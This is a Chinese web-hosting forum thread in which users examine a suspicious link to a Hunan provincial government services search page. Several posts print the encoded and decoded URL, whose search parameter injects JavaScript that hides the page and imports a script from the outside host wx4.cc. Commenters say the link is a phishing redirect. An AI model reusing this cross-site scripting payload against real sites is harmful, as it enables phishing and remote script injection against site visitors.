全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1081|回复: 8
打印 上一主题 下一主题

[美国VPS] 这是漏洞被利用了么

[复制链接]
跳转到指定楼层
1#
发表于 2024-4-11 11:42:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
看不出怎么操作的。
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11%252522%25257D%25253B%252524%252528%252560*%252560%252529.hide%252528%252529%25253Bimport%252528%252527%25252F%25252Fwx4.cc%25252Fhunan%252527%252529%25253B%25257B%252522&areanamesearch=%2525u6E56%2525u5357%2525u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair
2#
发表于 2024-4-11 11:47:11 | 只看该作者
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=湖南省&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair
3#
 楼主| 发表于 2024-4-11 11:48:15 | 只看该作者
a692830 发表于 2024-4-11 11:47
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hun ...

这样看就是这网站js有漏洞呀
4#
发表于 2024-4-11 11:49:38 | 只看该作者
没有多大用啊 微信 QQ均已经拦截
5#
发表于 2024-4-11 11:49:52 来自手机 | 只看该作者
magotcai 发表于 2024-4-11 11:48
这样看就是这网站js有漏洞呀

反馈一下,说不定有钱拿
6#
发表于 2024-4-11 11:54:21 | 只看该作者
多次urldecode后可以看到URL传递的参数如下:

/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=%u6E56%u5357%u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

通过wordsearch参数传入的JS代码调用了//wx4.cc/hunan这个JS


8#
发表于 2024-4-12 10:00:45 | 只看该作者
这帮逼人真牛逼
9#
发表于 2024-4-12 10:30:12 | 只看该作者
能跳转钓鱼
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-22 05:13 , Processed in 0.064307 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表